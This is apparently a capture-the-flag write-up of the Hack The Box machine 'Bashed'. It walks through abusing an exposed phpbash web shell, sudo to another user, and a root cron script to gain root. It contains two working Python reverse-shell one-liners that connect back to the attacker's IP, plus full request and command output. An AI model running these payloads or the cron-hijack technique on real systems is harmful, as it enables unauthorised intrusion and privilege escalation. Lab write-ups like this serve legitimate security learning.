Bashed

Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name.

Ports

HTTP only. Makes it easy, no?

HTTP

On the webpage we get some information about something called phpbash, and there is a link to a Github repo where we can inspect the code. Essentially it takes POST requests and runs them as shell_exec. We need to find it on the website; a quick run with dirsearch turns up /dev and we can find what we’re after.

http://10.10.10.68/dev/phpbash.php

We can send it commands; I use Burp Repeater to get myself a reverse shell:

POST /dev/phpbash.php?cmd=id HTTP/1.1
Host: 10.10.10.68
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 252
Origin: http://10.10.10.68
Connection: close
Referer: http://10.10.10.68/dev/phpbash.php?cmd=id

cmd=cd /var/www/html/dev; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

On the box

I check sudo -l and find I can do whatever I want as scriptmanager; so I become scriptmanager.

connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 40400
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash  
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ cd ~
cd ~
scriptmanager@bashed:~$ pwd
pwd
/home/scriptmanager

That’s all well and good, but I need to know what scriptmanager has access to. I search for files:

scriptmanager@bashed:/$ find . -user scriptmanager 2>/dev/null
find . -user scriptmanager 2>/dev/null
./scripts
./scripts/test.py
./home/scriptmanager
./home/scriptmanager/.profile
./home/scriptmanager/.bashrc
./home/scriptmanager/.nano
./home/scriptmanager/.bash_history
./home/scriptmanager/.bash_logout
# etc, including about a million /proc

Right; what’s test.py?

scriptmanager@bashed:/scripts$ ls -lash
ls -lash
total 16K
4.0K drwxrwxr--  2 scriptmanager scriptmanager 4.0K Dec  4  2017 .
4.0K drwxr-xr-x 23 root          root          4.0K Dec  4  2017 ..
4.0K -rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
4.0K -rw-r--r--  1 root          root            12 Mar  7 00:22 test.txt
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$

Two interesting things to note here. One, we own the python script. Two, root owns the output and it was created very recently. I check /etc/crontab but there is nothing interesting. I wait a minute or two, and a new copy of test.txt is created. So it is running as a root cron. That’s our in:

scriptmanager@bashed:/scripts$ rm test.py
rm test.py
scriptmanager@bashed:/scripts$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),; os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> test.py
<no(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> test.py                  
scriptmanager@bashed:/scripts$

We don’t have to wait long:

┌──(root💀kali)-[/opt/htb/bashed]
└─# nc -nvlp 1235                                                                                                                                                     1 
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 36520
/bin/sh: 0: cant access tty; job control turned off
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
bashed
# cd /root
# ls -lash
total 32K
4.0K drwx------  3 root root 4.0K Dec  4  2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec  4  2017 ..
4.0K -rw-------  1 root root    1 Dec 23  2017 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  4  2017 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Dec  4  2017 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -r--------  1 root root   33 Dec  4  2017 root.txt
4.0K -rw-r--r--  1 root root   66 Dec  4  2017 .selected_editor
# cat root.txt
flag goes here

Pretty simple. Strictly speaking Traceback would be next but I’ve done that, so Nibbles it is.